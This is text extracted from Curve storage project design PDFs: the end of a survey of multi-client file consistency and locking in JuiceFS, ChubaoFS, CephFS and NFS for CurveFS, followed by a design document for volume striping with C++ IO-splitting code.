flock的更新是一条记录的删除或者插入, plock的更新的\n时候需要按照一定的规则进行新增锁记录的插入。 \n \n总结 \nJuiceFS 提供「关闭再打开( close-to-open)」一致性保证,即当两个及以上客户端同\n时读写相同的文件时,客户端 A 的修改在客户端 B 不一定能立即看到。但是,一旦这个\n文件在客户端 A 写入完成并关闭,之后在任何一个客户端重新打开该文件都可以保证能\n访问到最新写入的数据,不论是否在同一个节点。 \n「关闭再打开」是 JuiceFS 提供的最低限度一致性保证,在某些情况下可能也不需要重\n新打开文件才能访问到最新写入的数据。例如多个应用程序使用同一个 JuiceFS 客户端\n访问相同的文件(文件变更立即可见),或者在不同节点上通过 tail -f 命令查看最\n新数据。 \njuicefs 对 posix 部分接口的支持: \nposix 是否支持 \nopen with O_APPEND 不支持。多节点情况下会相互 覆盖 \nflock/fcntl 支持多节点的 flock/fcntl ,允许多节点写入,保证最终一致性 \nChubaoFS \nCurveFS的元数据设计架构类似 ChubaoFS ,这里就不再说明了。 \nchubaofs 支持: \n1. 一个客户端的写不能立马被其他客户端看到, fsync才会明确去刷这个 buffer,不\n然只是定期刷;只有 buffer数据刷出去了,另外的客户端才能看到。 \nchubaofs 不支持: \n1. 多个客户端同时写同一个文件的同一个位置 \n2. 多个客户端的同一个文件 O_APPEND flag \nchubaofs 对 posix 部分接口的支持: \nposix 是否支持 \nopen with O_APPEND 不支持。多节点情况下会相互覆盖 \nflock/fcntl 不支持。 chubao使用的bazil/fuse 不支持锁的设置 \ncase opGetlk: \npanic(\"opGetlk\") \ncase opSetlk: \npanic(\"opSetlk\") \ncase opSetlkw: \npanic(\"opSetlkw\") \nCephFS \ncephfs的官方文档 提到了cepfs和posix标准在多客户端并发写入情况下的差别: \n1. CephFS 比本地 Linux 内核文件系统的 posix语义更宽松(例如,跨越对象边界的写\n入可能会不一致)。在多客户端一致性方面,它严格小于 NFS,在写入原子性方面通常小\n于 NFS。 \n换句话说,当涉及到 POSIX 时: \nHDFS < NFS < CephFS < {XFS, ext4} \n2. 如果客户端尝试编写文件失败,写入操作不一定是原子的。也就是说,客户端可能会\n在使用 8MB 缓冲的 O_SYNC 标记打开的文件中调用 write() 系统调用,然后意外终\n止,且只能部分应用写入操作。几乎所有文件系统(甚至本地文件系统)都有此行为。 3. 
在同时发生写操作的情况下,超过对象边界的写入操作不一定是原子的。例如,写入\n器 A 写入 \"aa|aa\" 和 writer B 同时写入 \"bb |bb\", 其中 \"|\" 是对象边\n界,编写 \"aa|bb\" 而不是正确的 \"aa|aa\" 或 \"bb|bb\"。 \ncephfs使用cap实现分布式锁 \n类似的实现有 samba的oplocks以及NFS的delegation 。 \ncaps是mds授予client对文件进行操作的许可证,当一个 client想要对文件元数据进\n行变更时,比如读、写、修改权限等操作,它都必须先获取到相应的 caps才可以进行这\n些操作。 \nceph对caps的划分粒度很细,且允许多个 client在同一个 inode上持有不同的 caps。 \n根据元数据内容的不同, cephfs将caps分为了多个类别,每种类别只负责作用于某些特\n定的元数据: \n类别 功能 \nPin \n— p mds是否将inode pin 在cache中 \nAuth — \nA 权限属性相关的元数据,主要是 owner、group、mode;但如果是完成的鉴权\n是需要查看 ACL的,这部分信息保存在 xattr中,这就需要 xattr相关的cap \n \nLink — \nL inode的link count \nXattr \n— X xattr \nFile \n— F 最重要也是最复杂的一个,用于文件数据,以及和文件数据相关的 size、\natime、ctime、mtim等 \ncaps permission \n权限类型 权限说明 \nCEPH_CAP_GSHARED client can reads (s) \nCEPH_CAP_GEXCL client can read and update (x) \nCEPH_CAP_GCACHE (file) client can cache reads (c) CEPH_CAP_GRD (file) client can read (r) \nCEPH_CAP_GWR (file) client can write (w) \nCEPH_CAP_GBUFFER (file) client can buffer writes (b) \nCEPH_CAP_GWREXTEND (file) client can extend EOF (a) \nCEPH_CAP_GLAZYIO (file) client can perform lazy io (l) \ncaps combination \n一个完整的 cap通过[类别+permission] 组成,client可以同时申请多个类别的 caps。\n但并不是每种 caps都可以使用每种 permission ,有些caps只能搭配部分 permission 。\n有关caps种类和permission 的结合使用,有一些几个规则: \n类型 说明 \nPin 二值型,有 pin就代表client知道这个 inode存在,这样 mds就一定会在\n其cache中保存这个 inode。 \nAuth、\nLink、\nXattr 只能为shared或者exclusive \n▪ shared: client 可以将对应元数据保存在本地并缓存和使用 \n▪ exclusive: client 不仅可以在本地缓存使用,还可以修改 \n下面是两个例子: \n▪ [A]s:某client对inode 0x11 有As的cap,此时收到一个查看\n0x11状态的系统调用,那么 client不需要再向 mds请求,直接通过\n查询自身缓存并进行处理和回复 \n▪ [A]x:某client对inode 0x11 有Ax的cap,此时收到一个修改\nmode的系统调用, client可以直接在本地进行修改并回复,并且在\n之后才将修改变更通知 mds File 最复杂的一种,下面是 File cap 的各个类别: \nfile cap 种类client权限 \nFs: client 可以将mtime和size在本地cache并读取使用 \nFx: client 可以将mtime和size在本地cache并进行修改和读取 \nFr: client 可以同步地从 osd读取数据,但不能 cache \nFc: client 可以将文件数据 cache在本地内存,并直接从 cache中读 \nFw: client 可以同步地写数据到 osd中,但是不能 buffer \nFb: client 可以buffer write ,先将写的数据维护在自己的内存中,在统\n一flush到后端落盘 \ncaps管理 \nlock \ncaps由mds进行管理,其将元数据划分为多个部分,每个部分都有专门的锁\n(SompleLock ,ScatterLock 、FileLock )来保护, mds通过这些锁的状态来确定 caps可\n以怎么样分配。 \nmds内部维护了每个锁的状态机,其内容非常负责,也是 mds保证caps分配准确性和数\n据一致性的关键。 \ncaps如何变更 \n▪ mds可以针对每个 client进行授予和移出 caps,通常是由其他 client的行为触发 \n▪ 例:比如 client1已经拥有了 inode 0x11 的cache read 的cap,此时\nclient2要对这个文件进行写,那显然除了授予 client2响应的写 caps的\n同时,还要剥夺 client1的cache read cap \n▪ 当client被移出caps时,其必须停止使用该 cap,并给mds回应确认消息。 mds\n需要等待收到 client的确认消息后才会 revoke。(如果 client挂掉或者处于某\n种原因没有回复 ack怎么办?) \n▪ client停止使用并不简单,在不同场景下需要完全不同的处理: \n▪ 例1:client被移出cache read cap ,直接把该 file的cache删掉,并变\n更状态就行,这样下次的 read请求过来时,还是到 osd去读 ▪ 例2:client被移出buffer write cap ,已经缓存了大量的数据还没有\nflush,那就需要先 flush到osd,再变更状态和确认,这可能就需要较长\n的时间 \n下面是一个修改权限的例子: 总结: \n总结: \n1. mds需要记住所有 client pin 的inode \n2. mds的cache需要比client的cache更多 \n3. 
caps是由mds和client共同协作维护的,所以 client需要正常运行,否则可能\n会block其他client \nfuse write 实例 \n以fuse client write 为例,简要分析下 fuse write( 主要流程 )时caps的代码逻辑: \nint64_t Client::_write(Fh *f, int64_t offset, uint64_t size, const char *buf, \n const struct iovec *iov, int iovcnt) \n{ \n want = CEPH_CAP_FILE_BUFFER; \n // 需要拥有 file write 和auth shared caps 才(即FwAs)能够写, get_caps 中如果检\n查没有caps则会 \n // 去向mds申请并等待返回 \n int r = get_caps(in, CEPH_CAP_FILE_WR|CEPH_CAP_AUTH_SHARED, want, &have, \nendoff); \n if (r < 0) \n return r; \n \n // 增加该inode对该caps的引用计数并检查该 caps是否正在使用中 \n put_cap_ref(in, CEPH_CAP_A UTH_SHARED); \n \n // 如果有buffer 或者lazy io cap 则直接在 objectcacher cache 中写 \n if (cct->_conf->client_oc && \n (have & (CEPH_CAP_FILE_BUFFER | CEPH_CAP_FILE_LAZYIO))) { \n // 缓存写的调用,异步、 cache、非阻塞 \n r = objectcacher ->file_write(&in ->oset, &in ->layout, \n in->snaprealm ->get_snap_context(), \n offset, size, bl, ceph::real_clock::now(), \n 0); \n } else { \n // 如果没有 buffer cap ,则直接通过 osd写 \n if (f->flags & O_DIRECT) \n _flush_range(in, offset, size); \n \n // 同步写的调用 \n filer->write_trunc(in ->ino, &in ->layout, \nin->snaprealm ->get_snap_context(), offset, size, bl, ceph::real_clock::now(), 0, \n in->truncate_size, in ->truncate_seq, \n &onfinish); \n } \n} \n总结 \ncephfs不需要用户做指定,对文件访问时都需要获取相应的权限。 \nposix 是否支持 \nopen with O_APPEND 不支持 \nflock/fcntl 内核版本支持, fuse客户端不确定 \nNFS \n简介 \n在存储系统中, NFS(Network File System, 即网络文件系统 ) 是一个重要的概念,已成\n为兼容Posix语义分布式文件系统的基础。它允许在多个主机之间共享公共文件系统,并\n提供数据共享的优势,从而最小化所需的存储空间。 \nNFS作为类UNIX系统的标准网络文件系统,在发展过程中逐步原生地支持了文件锁 (从\nNFSv4开始)。NFS从上个世界 80年代诞生至今,共发布了 3个版本: NFSv2、NFSv3、\nNFSv4。NFSv4最大的变化是有“状态”了。某些操作需要服务端维持相关状态,如文件\n锁,例如客户端申请了文件锁,服务端就需要维护该文件锁的状态,否则其他客户端冲突\n的访问就无法检测。 \n数据和元数据缓存一致性 \nNFS客户端是弱缓存一致性,用于满足绝大多数文件共享场景。 \n▪ Close-to-open 缓存一致性( weak cache consistency ,CTO)。通常文件共\n享是完全顺序的,比如: clienA进行了open,write,close;clientB 进行\nopen,然后可以读到 clientA的写入数据。 NFS client 在文件open的时候向\nserver发送请求查询 open权限;NFS client 在文件close的时候将本地文件的\n变更写入到 server以便再次打开可以读取。在 mount的时候可以通过 nocto 选\n项关闭。 \n▪ 弱缓存一致性( weak cache consistency ,WCC)。client的data cache 中的数\n据不总是最新的。当客户端有很多并发操作同时更新文件时(多客户端异步写),文件上的数据最终是什么是 不确定的。但 NFS为client端提供了接口来检\n查当前的数据是否被其他客户端修改过。 \n▪ 属性缓存( Attribute caching )。在挂载的时候加上 noac 参数保证多 client\n情况下的缓存一致性,此时 client端不能缓存文件元数据,元数据每次需要从\nserver端获取。这种方式使得客户端能及时获取到文件的更新信息,但会增加很\n多网络开销。需要注意的是, noac参数情况下, data cache 是允许的,因此,\ndata cache 的一致性是不能保证的。 如果需要强缓存一致性,应用应该使用文\n件锁。或者应用程序可以使用 O_DIRECT 方式打开文件以禁用数据缓存。 \n客户端缓存 \n当应用程序共享文件的时,无论是否在同一个 client上,应用程序都需要考虑冲突。\nNFSv4支持Share reservations 和 byte-range locks 两种实现互斥的方式。 NFSv4需要\n有data cache 以支持一些应用。 \nShare reservations 是一种控制文件访问权限的机制,独立于 byte-rage locking 。当\nclient端OPEN文件时,他需要指定访问类型( READ, WRITE, o r BOTH)以及访问权限\n(OPEN4_SHARE_DENY_NONE,OPEN4_SHARE_DENY_READ, OPEN4_SHARE_DENY_WRITE, or \nOPEN4_SHARE_DENY_BOTH )。伪代码如下: \nif (request.access == 0) \n return (NFS4ERR_INVAL) \n else if ((request.access & file_state.deny) || \n (request.deny & fi le_state.access)) \n return (NFS4ERR_DENIED) \n为了提供正确的共享语义, client必须使用 OPEN操作来获取初始文件句柄,并指出想要\n的访问以及拒绝哪些访问。 OPEN/CLOSE 还需要遵循一下规则: \n▪ client OPEN 文件时, client需要从服务器重新获取数据并判断缓存中的数据是否\n已经失效。 \n▪ client CLOSE 文件时,需要将所有的缓存数据持久化。 \n对于选择文件锁的应用,有一组类似的规则。 \n▪ 当client获得指定区域的文件锁后,这段区域 的数据缓存失效。 \n▪ 在client释放指定区域文件锁之前,客户端所有的修改必须持久化。 \n结论 \nposix 是否支持 open with \nO_APPEND 不支持 (https://man7.org/linux/man -\npages/man2/open.2.html ) \nflock/fcntl 支持。并且在文件有强一致性要求时,推荐应用使用。 \n业务场景 \n1. 对多挂载的要求是什么?支持挂载到同一个文件系统?支持同时读写同一个文件? \n2. 对一致性的要求是什么? close-to-open? 还是更严格的要求? \n业务 对文件系统的需求 \ngoblinceph 1. 
大部分场景是多个节\n点写一个文件系统的\n不同文件,很少对相\n同文件进行读写。在\n对相同文件进行读写\n时,不要求文件系统\n做正确性和一致性的\n保证,如果业务有需\n求,可以调用文件锁\n保证; \n2. 一致性要求其实不是\n很强烈,正常一致性\n应该通过其他更专业\n的方案。 \neassyai 使用tensorflow 平台,所以\n和AI场景的通用痛点类似的\n。 \nAI场景 \n人工智能是数据的消耗大户,对存储有针对性的需求。 \nAI访问存储的几个特点: \n• 海量文件 ,训练模型的精准程度依赖于数据集的大小,样本数据集越大,就为模\n型更精确提供了基础。通常,训练任务需要的文件数量都在几亿,十几亿的量级,\n对存储的要求是能够承载几十亿甚至上百亿的文件数量。 • 小文件,很多的训练模型都是依赖于图片、音频片段、视频片段文件,这些文件\n基本上都是在几 KB到几MB之间,对于一些特征文件,甚至只有几十到几百个字\n节。 \n• 读多写少, 在大部分场景中,训练任务只读取文件,把文件读取上 来之后就开始\n计算,中间很少产生中间数据,即使产生了少量的中间数据,也是会选择写在本\n地,很少选择写回存储集群, 因此是读多写少,并且是一次写,多次读 。 \n• 目录热点, 由于训练时,业务部门的数据组织方式不可控,系统管理员不知道用\n户会怎样存储数据。很有可能用户会将大量文件存放在同一个目录,这样会导致多\n个计算节点在训练过程中,会同时读取这一批数据,这个目录所在的元数据节点就\n会成为热点。跟一些 AI公司的同事交流中,大家经常提到的一个问题就是,用户\n在某一个目录下存放了海量文件,导致训练的时候出现性能问题,其实就是碰到了\n存储的热点问题。 \n综上,对于 AI场景来说, 对多挂载没有一致性需求, 主要的挑战是: \n1. 海量文件的存储 \n2. 小文件的访问性能 \n3. 目录热点(这里有一个解决方案虚拟目录,后续我们解决这个问题的时候可以参\n考。目前 Curve使用的是静态子树 +哈希的方案) \nCurveFS 如何支持多挂载 \n本文主要调研了传统分布式文件系统: GPFS、Lustre、CephFS、NFS 和 面向云原生环境\n设计的分布式文件系统: JuiceFS 和 Chubaofs 。 \n上述分析可以得出: \n▪ GPFS、Lustre、NFS、CephFS 都支持多节点的读写同步,提供数据和元数据多个级\n别的一致性。 \n▪ JuiceFS 使用中心节点管理锁,支持多节点读写同步,保证最终一致。 \n▪ ChubaoFS 支持多节点写不同区域,保证最终一致。不保证多节点写同一区域的一\n致性。 \n对于以上四中场景, curvefs 在并发读写场景下需要支持何种一致性?如何支持?是本文\n需要得出的结论。 \n1. CurveFS 需要支持写写互斥,读写互斥? \n1. posix文件接口的语义是针对多进程情况下的读写并发行为,并没有规定多\n节点下的读写并发行为。 2. NFS给出了读写并发行为下一致性的保证: close-to-open缓存一致性、弱\n缓存一致性 (提供接口检查是否被其他客户端修改过,其他不做保证 )、属性\n缓存(挂载的时候指定 noac) \n3. 所以CurveFS 无需默认支持写写互斥、读写互斥。 CurveFS 对读写并发行为\n的规定如下: \n1. close-to-open一致性并提供开关 (cto/nocto) 。close完再打开文\n件,一定可以读到全部的最新数据。 \n2. 支持文件锁 fcntl、flock。让用户可以通过该接口实现并发读写情\n况下的强一致语义。( O_APPEND 可以不做支持,因为性能必然很\n差,实际估计不会应用。) \n3. 更多挂载选项 支持:cto/ncto (是否开启 cto,ncto可以提高只读挂\n载的性能)、 ac/noac(是否开启元数据缓存)、 local_lock (non、\nposix、flock、all 是否仅支持本地锁) \n2. 如何实现? \n1. cto一致性, cto/ncto 开关。ncto时打开文件允许缓存不更新。 \n2. flock、fcntl \n实现可以参照: LDML(参考资料:\nUnderstanding_Lustre_Filesystem_Internals )、NFS(NFS:Opens and \nByte-Range Locks )、JuiceFS(源码阅读)。 \n3. 更多挂载选项支持:可以参考 NFS。 \n参考文档 \n1. GPFS: A Shared -Disk File System for Large Computing Clusters \n2. GPFS—三大关键组件 \n3. Lustre分布式锁管理器的分析与改进 \n4. 文件系统那些事 -第4篇 并行文件系统之开源解决方案 Lustre \n5. Lustre wiki \n6. juicefs/docs/zh_cn/cache_management.md \n7. 被遗忘的桃源 ——flock 文件锁 \n8. 多进程之间的文件锁 \n9. juicefs readme \n10.多写文件系统与 DLM 设想 \n11.CEPH 文件系统限 制和 POSIX 标准 \n12.CephFS Caps \n13.CephFS caps 简介 \n14.What are “caps”? (And Why Won ’t my Client Drop Them?) - Gregory \nFarnum, Red Hat \n15.CAPABILITIES IN CEPHFS \n16.cephfs:用户态客户端 write \n17.NFS文件锁一致性设计原理解析 \n18.Network File System (NFS) Version 4 Protocol \n19.AI 场景的存储优化之路 \n20.man5nfs \n21.Lustre文件系统 I/O锁的应用与优化 \n22.Lustre & Application I/O \n \n \n \n" } ]
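The survey above concludes that CurveFS should not impose write-write or read-write exclusion by default, and should instead expose fcntl/flock so that applications needing strong consistency under concurrent multi-client access can enforce it themselves. The following is a minimal, illustrative C++ sketch of how an application would combine O_APPEND, flock() and fcntl() byte-range locks on a POSIX-compliant mount; the file paths and the locked byte range are placeholders, not CurveFS-specific values.

    // Minimal sketch: combining O_APPEND, flock() and fcntl() byte-range locks
    // on a POSIX mount. Paths and the locked range are illustrative only.
    #include <fcntl.h>
    #include <sys/file.h>
    #include <unistd.h>
    #include <cstdio>
    #include <cstring>

    int main() {
        // 1. O_APPEND: the kernel moves the offset to EOF before each write,
        //    so concurrent appends from multiple processes do not interleave
        //    inside a single write() call.
        int afd = open("/mnt/curvefs/app.log", O_WRONLY | O_CREAT | O_APPEND, 0644);
        if (afd < 0) { perror("open O_APPEND"); return 1; }
        const char line[] = "one atomic log line\n";
        if (write(afd, line, sizeof(line) - 1) < 0) perror("write");
        close(afd);

        // 2. flock(): advisory whole-file lock attached to the open file
        //    description; other processes must also call flock() to cooperate.
        int fd = open("/mnt/curvefs/shared.dat", O_RDWR | O_CREAT, 0644);
        if (fd < 0) { perror("open"); return 1; }
        if (flock(fd, LOCK_EX) == 0) {          // blocks until the exclusive lock is granted
            // ... critical section: read-modify-write the whole file ...
            flock(fd, LOCK_UN);
        }

        // 3. fcntl() byte-range lock: lock only bytes [4096, 8192) for writing,
        //    so writers touching disjoint ranges can proceed in parallel.
        struct flock fl;
        memset(&fl, 0, sizeof(fl));
        fl.l_type = F_WRLCK;
        fl.l_whence = SEEK_SET;
        fl.l_start = 4096;
        fl.l_len = 4096;
        if (fcntl(fd, F_SETLKW, &fl) == 0) {    // F_SETLKW waits instead of failing
            // ... write to the locked range with pwrite() ...
            fl.l_type = F_UNLCK;
            fcntl(fd, F_SETLK, &fl);
        }
        close(fd);
        return 0;
    }

Note that both lock families are advisory, as the flock section above stresses: they only coordinate processes that also take the locks, and do not stop an uncooperative process from writing the file directly.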
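The byte-range schemes surveyed above (GPFS byte-range tokens, Lustre extent locks, JuiceFS plock records) all reduce to the same conflict rule: two locks conflict only if their ranges overlap and at least one of them is a write lock. The sketch below shows that rule in isolation; the types and function names are invented for illustration and are not taken from any of those code bases.

    // Minimal sketch of the shared range-lock conflict rule. Types and names
    // are illustrative, not GPFS/Lustre/JuiceFS code.
    #include <cstdint>
    #include <vector>

    enum class LockType { Read, Write };

    struct RangeLock {
        uint64_t owner;   // client / session id
        LockType type;
        uint64_t start;   // inclusive
        uint64_t end;     // exclusive; a very large value models "to EOF / infinity"
    };

    bool Overlap(const RangeLock& a, const RangeLock& b) {
        return a.start < b.end && b.start < a.end;
    }

    bool Conflict(const RangeLock& held, const RangeLock& wanted) {
        if (held.owner == wanted.owner) return false;   // an owner never conflicts with itself
        if (!Overlap(held, wanted)) return false;       // disjoint ranges are always compatible
        return held.type == LockType::Write ||
               wanted.type == LockType::Write;          // read/read is the only shared mode
    }

    // A request is grantable only if it conflicts with none of the held locks;
    // otherwise the caller waits (blocking lock) or fails (non-blocking lock).
    bool CanGrant(const std::vector<RangeLock>& held, const RangeLock& wanted) {
        for (const auto& l : held) {
            if (Conflict(l, wanted)) return false;
        }
        return true;
    }

The interesting engineering in each system is not this check itself but where it runs and how lock state is distributed: token splitting between nodes in GPFS, per-OST lock servers with callbacks in Lustre, and a central database table scanned by each client in JuiceFS, as described above.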
{ "category": "Runtime", "file_name": "curve-stripe.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
[ { "data": "© XXX Page 1 of 9curve条带特性设计文档© XXX Page 2 of 9修订记录\n背景介绍\n方案设计\n条带化特性\n数据结构\n条带特性需要修改的流程\n详细流程描述\n升级相关\ncinder&&nova\nstorage&&rpc\n修订记录\n \n时间 内容 作者 Reviewer\n 2020.12.15  完成初稿  胡遥  \n2020.12.17 修复评审意见 胡遥  curve全体人员\n背景介绍\ncurve在大IO顺序写的场景下性能表现比较差,主要原因是顺序写一段时间内会集中发到某一个copyset,导致并发性不够,而某个copyset拥堵导致平均时延变高。在分析清楚愿意之后,考虑通过增加卷的条带特\n性来加大client到copyset的并发性,提高顺序写性能。\n方案设计\n条带化特性\n条带化行为主要受3个参数的控制:\nchunksize:默认文件的大小16MB\nstripe_unit:条带切分的粒度,每个stripe_unit的连续字节会被保存在同一个文件中,client写满stripe unit大小的数据后,去下一个chunk写同样的大小。\nstripe_count: 表示条带的宽度,client连续写多少个stripe_unit后,又重新写第一个文件。\n一般来说stripe_count越大,stripe_unit越小,顺序写并发被打的越散,并发度越高。\n举例说明一下client写入io的顺序,以及chunk数据的分布情况。假如chunksize为8MB,stripe_unit 2MB, 。如下图:每个编号代表了一个条带分片,即stripe_unit stripe_count 4\n2MB的大小,编号表示了io的顺序,client是先写了2MB到chunk1上,然后写2MB到chunk2上,依次循环。直到这4个chunk都写满后,开始写新的一组条带。\n注意:stripe_unit * stripe_count不一定等于chunksize,比如这里如果chunksize是16MB的话,那么chunk1还要继续追 8。 加写16,20,24,2© XXX Page 3 of 9\n数据结构\n条带涉及的主要数据结构包括:\nclient端© XXX Page 4 of 9typedef struct FInfo {\n uint64_t id;\n uint64_t parentid;\n FileType filetype;\n uint32_t chunksize;\n uint32_t segmentsize;\n uint64_t length;\n uint64_t ctime;\n uint64_t seqnum;\n // userinfo\n UserInfo_t userinfo;\n // owner\n std::string owner;\n std::string filename;\n std::string fullPathName;\n FileStatus filestatus;\n std::string cloneSource;\n uint64_t cloneLength{0};\n uint32_t stripeUnit;\n uint32_t stripeCount;\n} FInfo_t;\nmessage CreateFileRequest {\n required string fileName = 1;\n required FileType fileType = 3;\n optional uint64 fileLength = 4;\n required string owner = 2;\n optional string signature = 5;\n required uint64 date = 6;\n optional uint32 stripeUnit = 7;\n optional uint32 stripeCount = 8;\n};\nmds端© XXX Page 5 of 9message FileInfo {\n optional uint64 id = 1;\n optional string fileName = 2;\n optional uint64 parentId = 3;\n optional FileType fileType = 4;\n optional string owner = 5;\n optional uint32 chunkSize = 6;\n optional uint32 segmentSize = 7;\n optional uint64 length = 8;\n optional uint64 ctime = 9;\n optional uint64 seqNum = 10;\n optional FileStatus fileStatus = 11;\n //,\n //RecycleBin/\n optional string originalFullPathName = 12;\n // cloneSource (curvefs)\n // s3\n optional string cloneSource = 13;\n // cloneLength cloneextent\n optional uint64 cloneLength = 14;\n optional uint32 stripeUnit = 15;\n optional uint32 stripeCount = 16;\n}\n条带特性需要修改的流程\nmds端\nCreateFile流程: , fileInfo新增条带参数的set/get函数,将条带数据保存在fileinfo中。 新增条带参数的合法性检查 如果没有设置条带参数,默认不开条带功能。\nDecodeFile流程:新增的stripeUnit和stripeCount采用optional类型, 。 支持新老版本的数据结构兼容\nclient端\nCreateFile流程:新增create2接口,增加条带参数。\n读/写流程:修改统一 。 的io切分函数IO2ChunkRequests,不影响原有逻辑\n工具\ncurve:create,stat\ncurve_ops_tool:不需要改\ncurvefs_python:cbd_client:create接口;libcurvefs.h:create接口© XXX Page 6 of 9 \n详细流程描述\nCreateFile流程,如下图。红色部分为需要添加的代码逻辑。\nclient读写流程:\n \n这一块也是整个条带特性的核心修改流程,主要改动点是Splitor::IO2ChunkRequests函数。该函数主要就是通过off和len找到读写对应chunklist以及chunk内的offset和len。由于之前poc已经完成相关代码,这\n里直接上代码分析\nint Splitor::IO2ChunkRequests(IOTracker* iotracker, MetaCache* metaCache,\n std::vector* targetlist,\n butil::IOBuf* data, off_t offset, size_t length,\n MDSClient* mdsclient, const FInfo_t* fileInfo) {\n ... 
\n targetlist->reserve(length / (iosplitopt_.fileIOSplitMaxSizeKB * 1024) + 1); \n \n const uint64_t chunkSize = fileInfo->chunksize;\n uint64_t stripeSize = fileInfo->stripeSize;\n const uint64_t stripeCount = fileInfo->stripeCount; //stripe count by one chunk\n if (stripeCount == 1) {\n LOG(INFO) << \"stripe count is one, stripe size == chunk size\"; \n stripeSize = chunkSize;© XXX Page 7 of 9 }\n const uint64_t stripesPerChunk = chunkSize / stripeSize;\n \n uint64_t cur = offset;\n uint64_t left = length;\n uint64_t curChunkIndex = 0;\n while (left > 0) {\n uint64_t blockIndex = cur / stripeSize;\n uint64_t stripeIndex = blockIndex / stripeCount;\n uint64_t stripepos = blockIndex % stripeCount;\n uint64_t curChunkSetIndex = stripeIndex / stripesPerChunk;\n uint64_t curChunkIndex = curChunkSetIndex * stripeCount + stripepos;\n \n uint64_t blockInChunkStart = (stripeIndex % stripesPerChunk) * stripeSize;\n uint64_t blockOff = cur % stripeSize;\n uint64_t curChunkOffset = blockInChunkStart + blockOff;\n uint64_t requestLength = std::min((stripeSize - blockOff), left);\n /*LOG(INFO) << \"request split curChunkIndex = \" << curChunkIndex\n << \", curChunkOffset = \" << curChunkOffset\n << \", requestLength = \" << requestLength\n << \", cur = \" << cur\n << \", left = \" << left;*/\n if (!AssignInternal(iotracker, metaCache, targetlist, data,\n curChunkOffset, requestLength, mdsclient,\n fileInfo, curChunkIndex)) {\n LOG(ERROR) << \"request split failed\"\n << \", off = \" << curChunkOffset\n << \", len = \" << requestLength\n << \", seqnum = \" << fileInfo->seqnum\n << \", chunksize = \" << chunkSize\n << \", chunkindex = \" << curChunkIndex;\n \n return -1;\n }\n left -= requestLength;© XXX Page 8 of 9 cur += requestLength;\n } \n}\n对代码中一些变量进行解释,如下图:\nblockindex:每个stripesize大小可以认为是一个block,blockindex表示在整个文件中的block索引编号,如图红色部分的blockindex为6\nstripeIndex:如图每一行是一个stripe,stripeIndex表示是stripe的索引编号,如图红色部分的stripeIndex为1\nchunksetIndex:表示条带里包含的chunk组。如图,整个4个chunk组成一个chunkset,编号为0。\nstripepos:在chunkset中属于的chunk位置,如图,红色部分stripepos为2.\n获取了以上几个数据后,我们可以计算真正需要获取的值。\ncurChunkIndex:chunk的索引,curChunkSetIndex * stripeCount (前面所有chunkset包含的chunk数量)+ stripepos\ncurChunkOffset:在chunk中的偏移。先计算cur所在的block在当前chunk的的偏移位置即blockInChunkStart=(stripeIndex % stripesPerChunk) * stripeSize;\n在计算cur在当前block的偏移位置:blockOff = cur % stripeSize;\n最后curChunkOffset = blockInChunkStart + blockOff。\n请求的长度为该block剩余的长度和整个请求剩余长度left的最小值:requestLength = std::min((stripeSize - blockOff), left);\n \n升级相关\ncinder&&nova\n由于我们接口的改动,需要cinder那边也进行适配,并联调测试\nstorage&&rpc© XXX Page 9 of 9存储和rpc涉及到的数据结构为message CreateFileRequest和message FileInfo,因为数据结构中添加的是optional参数,在序列化和反序列化都无报错。后续测试的时候也需要增对升级进行用例设计。\n \n \n \n " } ]
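To make the splitting arithmetic above concrete, here is a standalone C++ sketch that re-derives the offset-to-chunk mapping using the document's example parameters (chunksize 8MB, stripe_unit 2MB, stripe_count 4) and walks a 24MB sequential write through it. MapOffset() mirrors the calculations in IO2ChunkRequests but is a simplified illustration, not the actual Splitor code.

    // Standalone sketch of the offset -> (chunk index, in-chunk offset) mapping
    // described above. Simplified re-derivation for illustration only.
    #include <algorithm>
    #include <cstdint>
    #include <cstdio>

    struct SplitResult {
        uint64_t chunkIndex;   // which chunk the bytes land in
        uint64_t chunkOffset;  // offset inside that chunk
        uint64_t length;       // bytes served from this chunk piece
    };

    SplitResult MapOffset(uint64_t cur, uint64_t left,
                          uint64_t chunkSize, uint64_t stripeUnit, uint64_t stripeCount) {
        const uint64_t stripesPerChunk = chunkSize / stripeUnit;
        const uint64_t blockIndex = cur / stripeUnit;           // global stripe-unit index
        const uint64_t stripeIndex = blockIndex / stripeCount;  // which stripe (row)
        const uint64_t stripePos = blockIndex % stripeCount;    // which chunk inside the row
        const uint64_t chunkSetIndex = stripeIndex / stripesPerChunk;

        SplitResult r;
        r.chunkIndex = chunkSetIndex * stripeCount + stripePos;
        const uint64_t blockInChunkStart = (stripeIndex % stripesPerChunk) * stripeUnit;
        const uint64_t blockOff = cur % stripeUnit;
        r.chunkOffset = blockInChunkStart + blockOff;
        r.length = std::min(stripeUnit - blockOff, left);
        return r;
    }

    int main() {
        const uint64_t MiB = 1024 * 1024;
        // Walk a 24MB sequential write and show how it fans out over chunks.
        uint64_t cur = 0, left = 24 * MiB;
        while (left > 0) {
            SplitResult r = MapOffset(cur, left, 8 * MiB, 2 * MiB, 4);
            std::printf("file off %2lluMB -> chunk %llu, chunk off %lluMB, len %lluMB\n",
                        (unsigned long long)(cur / MiB), (unsigned long long)r.chunkIndex,
                        (unsigned long long)(r.chunkOffset / MiB), (unsigned long long)(r.length / MiB));
            cur += r.length;
            left -= r.length;
        }
        return 0;
    }

Running it shows the 24MB write landing on chunks 0, 1, 2, 3 in rotation, 2MB at a time, which is exactly the fan-out across chunks (and hence copysets) that the stripe feature relies on to raise concurrency for large sequential writes.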
{ "category": "Runtime", "file_name": "release2.4-test.pdf", "project_name": "Curve", "subcategory": "Cloud Native Storage" }
